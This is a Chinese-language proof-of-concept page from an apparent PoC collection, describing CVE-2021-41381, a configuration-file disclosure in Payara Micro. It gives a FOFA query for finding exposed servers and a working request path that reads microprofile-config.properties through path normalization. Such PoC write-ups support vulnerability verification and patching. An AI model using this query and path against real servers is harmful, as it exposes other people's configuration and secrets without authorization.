Awesome-POC/Web服务器漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md
2022-05-25 16:51:48 +08:00

31 lines
638 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
## 漏洞描述
PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取获取敏感信息
## 漏洞影响
```
Payara Micro Community 5.2021.6
```
## FOFA
```
app="Payara-Micro"
```
## 漏洞复现
产品页面
![image-20220525163706617](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637689.png)
验证POC
```
/.//WEB-INF/classes/META-INF/microprofile-config.properties
```
![image-20220525163715004](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637074.png)